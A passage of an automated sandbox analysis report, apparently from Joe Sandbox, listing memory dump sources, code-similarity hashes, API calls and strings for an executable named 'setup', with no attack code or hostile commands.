                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFromLibraryLoadMonitorProcWindowmalloc
                                                                                                    • String ID: Could not initialize NanoVG!$GetDpiForMonitor$shcore$N2
                                                                                                    • API String ID: 2860666693-2125931875
                                                                                                    • Opcode ID: ff56f92e75b8a45c26dca7ffbbdea52399bdc718e21c964dfd6ed50d8cedaff8
                                                                                                    • Instruction ID: 7627f4a4d04526953a5662f568e1bc4d617ebfa8d9adad5f3b9ca64ea01cec40
                                                                                                    • Opcode Fuzzy Hash: ff56f92e75b8a45c26dca7ffbbdea52399bdc718e21c964dfd6ed50d8cedaff8
                                                                                                    • Instruction Fuzzy Hash: 03D157B0908310DFDB04AF64D58979EBBF4BF54304F12886DE8899B252E778D894CF96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$callocmallocreallocstrncpy
                                                                                                    • String ID: ?
                                                                                                    • API String ID: 882788776-1684325040
                                                                                                    • Opcode ID: 5be90a16218e64df58aade3fb22e4dc54e3777b0bac78db101d2c698291a7d2b
                                                                                                    • Instruction ID: 81f93c6eab5fc964d351eacdd18357db9d85d03442ac86f8e2286b6cb99f7614
                                                                                                    • Opcode Fuzzy Hash: 5be90a16218e64df58aade3fb22e4dc54e3777b0bac78db101d2c698291a7d2b
                                                                                                    • Instruction Fuzzy Hash: 5851F270518701CFC710EF29C48465ABBE0BF84354F458A6EE8A89B396E731D969CF52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeviceInputList$callocfree
                                                                                                    • String ID: $ $IG_
                                                                                                    • API String ID: 544165277-467309895
                                                                                                    • Opcode ID: a646fefc831c2349561a2d6df7f7628b52d8d612785ce3826756b5f09ea92721
                                                                                                    • Instruction ID: 57a32386517ab1ad8f48b5aa8b837b93bfb95bc4be1f464aa2b7c1963e69cac9
                                                                                                    • Opcode Fuzzy Hash: a646fefc831c2349561a2d6df7f7628b52d8d612785ce3826756b5f09ea92721
                                                                                                    • Instruction Fuzzy Hash: 634158705283028FD754EF28D48462FBBE0EF84368F108D2EE998C7390E774D9598B52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exitmalloc$longjmpmemcpy
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$Fatal error: putbuf %d in buffer of size %d
                                                                                                    • API String ID: 3121113658-225099155
                                                                                                    • Opcode ID: 6d15ef7c1fbfe8b1ac8c41dca9c3b3b71c85c09266491aeb4c93a8d5d8f94663
                                                                                                    • Instruction ID: f3b818488967a4a296aab73fd9d97338c38631ac3504dfa47838faca331fd01a
                                                                                                    • Opcode Fuzzy Hash: 6d15ef7c1fbfe8b1ac8c41dca9c3b3b71c85c09266491aeb4c93a8d5d8f94663
                                                                                                    • Instruction Fuzzy Hash: 7F4103B09187019BC700EF69C48570ABBE0BF88718F55CA6DE88C9B346D775D851CF92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00221D09: memset.MSVCRT ref: 00221D27
                                                                                                      • Part of subcall function 00221D09: memcpy.MSVCRT(-00000006,?,?,?,0000F000,00225512,-00000006,?,?,?,00000000), ref: 00221D54
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,?), ref: 0022296F
                                                                                                      • Part of subcall function 00210FF1: malloc.MSVCRT ref: 00210FF5
                                                                                                    • strtoul.MSVCRT ref: 00222991
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$mallocmemsetstrtoul
                                                                                                    • String ID: CHFX$CNAM$MIDI$PNAM$STPM$XTPM$text
                                                                                                    • API String ID: 1671770056-2404278218
                                                                                                    • Opcode ID: b5e4d0e0f9cca1d1d5cda82d00178bbbf711984f0cb8109ef05308aaa9d85798
                                                                                                    • Instruction ID: 3e774189bbd1d3c8619430924b06aafb6a41ee7f5d66faa28fd5c2f6b40cd9cf
                                                                                                    • Opcode Fuzzy Hash: b5e4d0e0f9cca1d1d5cda82d00178bbbf711984f0cb8109ef05308aaa9d85798
                                                                                                    • Instruction Fuzzy Hash: E6310A75624362FADF25AEE4BC82B7D379C5B61300F300516E845C7042DA66D9FC8712
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Fatal error: DataTables::add() called with _table_type=%d that is larger than maximum allowed %d, xrefs: 002083C9
                                                                                                    • ERROR: can't alloc %lu memory bytes, xrefs: 002084BD
                                                                                                    • %s, xrefs: 002083E9, 002084DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exit$Charfreelongjmpmemcpy
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$Fatal error: DataTables::add() called with _table_type=%d that is larger than maximum allowed %d
                                                                                                    • API String ID: 435699479-403071077
                                                                                                    • Opcode ID: 53b965d1ad0238b0c5d568f22bc92929c86f4ead037dc55c386b1aaad7853b71
                                                                                                    • Instruction ID: 9f6e2776c46dd18203c4952aa47f61f0bc32d43460f9125031ce77f3d9c81130
                                                                                                    • Opcode Fuzzy Hash: 53b965d1ad0238b0c5d568f22bc92929c86f4ead037dc55c386b1aaad7853b71
                                                                                                    • Instruction Fuzzy Hash: F84121B0518712CFCB10EF28C58561ABBE0BF89344F55C96EE8C88B206D774D891CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$_filelengthi64_wopen_wrename$strcpy
                                                                                                    • String ID: ERROR: can't alloc %lu memory bytes$quasiwrite
                                                                                                    • API String ID: 3285416094-3075816745
                                                                                                    • Opcode ID: b6b28c5c1575f6aab556f6f1592b1eb85f7fc331484e8b73d9234555af4c68cb
                                                                                                    • Instruction ID: 38e71920a0543d46f73bc51191eabd6a2fedb3c07860080bfcae294eb01b82c2
                                                                                                    • Opcode Fuzzy Hash: b6b28c5c1575f6aab556f6f1592b1eb85f7fc331484e8b73d9234555af4c68cb
                                                                                                    • Instruction Fuzzy Hash: 3941A1B49087189FCB65DF68C9847AABBF0BF49304F0188A9EA88E7310D774D984CF51
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Win32: Failed to remove raw input device, xrefs: 0024AF5C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$ClientClipDevicesInputRegisterScreen
                                                                                                    • String ID: Win32: Failed to remove raw input device
                                                                                                    • API String ID: 630632200-53561655
                                                                                                    • Opcode ID: d079db03ceddae1025e91f7a7f3b438b5ce19586c91992915fb5da6b483e0e25
                                                                                                    • Instruction ID: de5b673cdab3c6f97347cd760873526b0b3c8d6fa20246cfa194fe0f91b5882f
                                                                                                    • Opcode Fuzzy Hash: d079db03ceddae1025e91f7a7f3b438b5ce19586c91992915fb5da6b483e0e25
                                                                                                    • Instruction Fuzzy Hash: 123109B1509301CFD740AF65E64835EBBF0BF8430AF01496DE8898B225E7B5D998CB97
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Char_closeexit$_wmkdir_wremovefreelongjmpstrcpy
                                                                                                    • String ID: %s$ERROR: can't close file %s
                                                                                                    • API String ID: 4173340046-2251370396
                                                                                                    • Opcode ID: 9235dd09dc0a3e8686b63c70b0d42c3543601ae94b9e89fb59001931a1da2693
                                                                                                    • Instruction ID: 3dfd0e9aef414422d0938d4a1a4ca68a9a448cfddb6c0bc7085631ce392e4d0d
                                                                                                    • Opcode Fuzzy Hash: 9235dd09dc0a3e8686b63c70b0d42c3543601ae94b9e89fb59001931a1da2693
                                                                                                    • Instruction Fuzzy Hash: 74112EB05287129BEB60BF25C44132E7AE1BF55341F57CC2DE8C99B242DB74C8909F52
                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0022D11B
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0022D126
                                                                                                    • timeGetTime.WINMM ref: 0022D133
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0006CEBE,00000000,00000004,?), ref: 0022D177
                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,?), ref: 0022D192
                                                                                                    • SetThreadPriority.KERNEL32(?,0000000F), ref: 0022D19E
                                                                                                    • ResumeThread.KERNEL32(?), ref: 0022D1A8
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0022D1B2
                                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 0022D1DE
                                                                                                    • timeGetTime.WINMM ref: 0022D1E4
                                                                                                      • Part of subcall function 0022CF71: SetEvent.KERNEL32(0022D079,?), ref: 0022CF85
                                                                                                      • Part of subcall function 0022CF71: WaitForSingleObject.KERNEL32(000000FF), ref: 0022CF93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CreateEvent$ObjectSingleTimeWaittime$AffinityCloseHandleMaskPriorityResume
